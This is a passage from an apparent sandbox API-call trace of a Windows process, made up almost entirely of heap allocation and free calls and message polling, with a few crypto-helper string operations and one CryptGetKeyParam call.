(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14128) returned 0x949138 [0042.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0042.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.658] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.659] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.659] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.660] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0042.661] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.661] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.665] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.665] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.665] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 